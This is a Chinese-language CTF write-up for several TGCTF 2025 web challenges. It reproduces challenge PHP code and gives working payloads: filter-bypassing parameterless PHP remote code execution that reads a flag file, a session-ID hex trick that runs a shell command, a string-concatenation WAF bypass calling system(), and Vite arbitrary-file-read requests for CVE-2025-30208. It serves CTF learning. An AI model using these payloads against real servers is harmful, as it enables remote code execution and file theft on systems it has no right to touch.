TGCTF
AAA偷渡阴平:
<?php $tgctf2025=$_GET['tgctf2025']; if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $tgctf2025)){ eval($tgctf2025); } else{ die('(╯‵□′)╯炸弹!•••*~●'); }
highlight_file(__FILE__);
|
打开一看发现过滤了一些特殊符号和1和3到9(感觉有点刻意了没有2(😀))这个是eval,正常是使用system的,不过’’””``都过滤了,正好sun师傅之前让我看看无参数rce,有用场了
var_dump(getallheaders());先试试water,可以 不过我还是喜欢使用get_defined_vars()这个,因为第一个是使用heard头,感觉有点麻烦了 var_dump(get_defined_vars());&b=111 发现: array(5) { ["_GET"]=> array(2) { ["tgctf2025"]=> string(29) "var_dump(get_defined_vars());" ["b"]=> string(3) "111" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(32) "26d0ac1ba2391440de04672e76f50b31" } ["_FILES"]=> array(0) { } ["tgctf2025"]=> string(29) "var_dump(get_defined_vars());" } ok了,可以进行rce了 ?tgctf2025=eval(end(current(get_defined_vars())));&b=system('ls /'); ?tgctf2025=eval(end(current(get_defined_vars())));&b=system('tac /flag'); (不过有2的话还可以session_start();system(hex2bin(session_id())); cookie:PHPSESSID=636174202f662a)
|
AAA偷渡阴平(复仇):
<?php $tgctf2025=$_GET['tgctf2025']; if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i", $tgctf2025)){ eval($tgctf2025); } else{ die('(╯‵□′)╯炸弹!•••*~●'); } highlight_file(__FILE__);
|
?tgctf2025session_start();system(hex2bin(session_id())); cookie:PHPSESSID=636174202f662a 这个过滤了一些函数之前的肯定使用不了了(毕竟是复仇吗哈哈哈哈)
|
前端GAME:
打开是一个消消乐,玩了玩(不过首先肯定是要看一下前端js的)发现只要分数高于17分就显示/tgflagggg,不过肯定是直接访问不了的,
发现了这里的vite
想起这里是有一个任意文件读取的漏洞的,在网上看了看,发现CVE-2025-30208,就ok了
curl "url+?import&raw"(url是你自己访问不了的地址)(不知道为什么在抖音上面看到了,大数据是懂我的)
|
火眼辩魑魅:
shell学姐会让青春CTF少年脸红吗?只有一个洞是通的,看不出来的话就尝试每个漏洞都试一遍哦,杂鱼~
|
额,什么都没有。dirsearch来扫一下,发现
User-Agent: * Disallow: tgupload.php Disallow: tgshell.php Disallow: tgxff.php Disallow: tgser.php Disallow: tgphp.php Disallow: tginclude.php
|
因为是shell学姐吗,直接看tgshell.php(其实是手里面有sun师傅独特的rce骚操作(感觉rce的骚姿势都好变态))(其他的后面再补充)
<?php $shell=$_POST["shell"]; { eval($shell); } ?>
|
随便试了试发现有waf,不慌,直接拿sun师傅rce骚操作一个个试(其实可以直接蚁剑直接连接的)
shell=$a='syst'.'em';$a('ls /'); ok了;爽了
|
前端GAME Plus:
(不如pro max)
这个就又是cve的了
curl "http://127.0.0.1:52091/tgflagggg?.svg?.wasm?init"
|